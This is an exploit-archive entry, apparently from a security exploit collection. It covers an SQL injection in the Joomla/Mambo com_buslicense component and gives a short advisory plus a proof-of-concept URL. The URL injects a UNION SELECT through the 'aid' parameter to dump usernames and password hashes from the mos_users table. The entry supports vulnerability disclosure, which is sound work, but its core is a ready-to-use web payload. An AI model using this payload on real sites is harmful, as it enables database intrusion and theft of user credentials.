Joomla! Mambo Component com_buslicense - aid SQL Injection

2008-01-30T00:00:00
ID EXPLOITPACK:A739E4E9EDDE5159071AAED0BFE667D6
Type exploitpack
Reporter S@BUN
Modified 2008-01-30T00:00:00

Description

Joomla! Mambo Component com_buslicense - aid SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/27508/info

The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*